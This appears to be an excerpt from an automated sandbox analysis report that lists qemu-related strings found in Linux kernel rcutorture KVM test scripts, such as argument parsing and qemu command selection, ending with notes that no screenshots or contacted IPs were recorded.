Source: functions.sh0.66.dr Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.66.dr Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: kvm-test-1-run.sh.66.dr Binary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
Source: functions.sh0.66.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm.sh.66.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: functions.sh0.66.dr Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm-test-1-run.sh.66.dr Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.66.dr Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
Source: functions.sh0.66.dr Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: kvm-test-1-run.sh.66.dr Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
Source: functions.sh0.66.dr Binary or memory string: identify_qemu_args () {
Source: kvm-test-1-run.sh.66.dr Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: functions.sh0.66.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.66.dr Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.66.dr Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh0.66.dr Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.66.dr Binary or memory string: --qemu-args|--qemu-arg)
Source: kvm.sh.66.dr Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: functions.sh0.66.dr Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: functions.sh0.66.dr Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.66.dr Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm-test-1-run.sh.66.dr Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: kvm.sh.66.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.66.dr Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh0.66.dr Binary or memory string: specify_qemu_cpus () {
Source: functions.sh0.66.dr Binary or memory string: echo qemu-system-ppc64
Source: functions.sh0.66.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: kvm.sh.66.dr Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
Source: functions.sh0.66.dr Binary or memory string: qemu-system-ppc64)
Source: functions.sh0.66.dr Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.66.dr Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm-recheck-rcu.sh.66.dr Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh0.66.dr Binary or memory string: # identify_qemu_append qemu-cmd
Source: kvm-test-1-run.sh.66.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.66.dr Binary or memory string: identify_qemu_vcpus () {
Source: functions.sh0.66.dr Binary or memory string: # qemu-args already contains "-smp".
Source: functions.sh0.66.dr Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh0.66.dr Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: functions.sh0.66.dr Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh0.66.dr Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.66.dr Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh0.66.dr Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh0.66.dr Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: kvm.sh.66.dr Binary or memory string: --qemu-cmd)
Source: functions.sh0.66.dr Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm-test-1-run.sh.66.dr Binary or memory string: qemu_args=$5
Source: kvm.sh.66.dr Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.66.dr Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: kvm-test-1-run.sh.66.dr Binary or memory string: # Generate qemu -append arguments
Source: kvm-test-1-run.sh.66.dr Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
Source: functions.sh0.66.dr Binary or memory string: # identify_qemu builddir
Source: kvm-test-1-run.sh.66.dr Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh0.66.dr Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: functions.sh0.66.dr Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.66.dr Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh0.66.dr Binary or memory string: echo qemu-system-i386
Source: functions.sh0.66.dr Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh0.66.dr Binary or memory string: echo qemu-system-x86_64
Source: functions.sh0.66.dr Binary or memory string: identify_qemu () {

No Screenshots

No contacted IP infos